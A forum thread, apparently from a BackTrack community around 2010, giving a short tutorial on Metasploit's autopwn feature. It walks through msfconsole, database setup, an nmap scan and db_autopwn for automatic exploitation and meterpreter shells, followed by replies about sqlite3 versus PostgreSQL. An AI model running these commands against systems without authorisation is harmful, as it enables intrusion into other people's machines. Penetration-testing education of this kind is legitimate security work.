Op please see your PM box with a note from me. Thanks.
MSF from the moment of its release is THE most powerful offensive tool in a pentester's arsenal. In this tutorial I plan to show how to use the autopwn feature of MSF from scanning to getting a meterpreter shell.
Let's boot up trusty ol' BT4 R1. Bring up your favourite terminal emulator.
Code:
cd /pentest/exploits/framework3
We'll use msf console because it's much less cluttered than the GUI.
Code:
./msfconsole
Wait a few minutes for MSF to load all modules and exploits.
Now that we have the msfconsole up and running we need to select a database driver to store info about our target.. I prefer sqlite3 'cause it doesn't need any further setup for me.
Code:
db_driver sqlite3
Now we need to create a new database to store the info.
Code:
db_create autopwn
Feel free to replace autopwn with any name.
Code:
db_connect
We are connected to the database.
Run a simple nmap scan to enumerate the host.
Code:
db_nmap target
To see host information:
Code:
db_hosts
And finally, for the actual autopwn just run:
Code:
db_autopwn -p -t -e
And there you have it... if an exploit worked you'll have a session...
If you don't, well, better luck next time.
It should be noted that the usage of sqlite3 is not supported by metasploit, and there are other forum threads regarding this --read postgres
Last edited by sickness; 11-07-2010 at 08:53 PM.
A little help regarding what @iproute said: http://www.backtrack-linux.org/forum...ostgresql.html
Thanks for sharing
Sorry about using sqlite3. Didn't know it was supported.. in my box it runs without a hitch tho.. but other drivers don't run out of the box.. this was before I saw sickness' post on PostgreSQL of course...
There are some reasons one might want to use sqlite instead of postgres or mysql for metasploit, but with the latter two, running db_autopwn will likely be more effective. I've run the same autopwn against the same vulnerable VM and witnessed this myself.
Also if you need to do reporting, sqlite may not be as well suited.
A great resource for metasploit other than the most excellent metasploit framework unleashed course can be found by performing a google search for 'metasploit megaprimer'.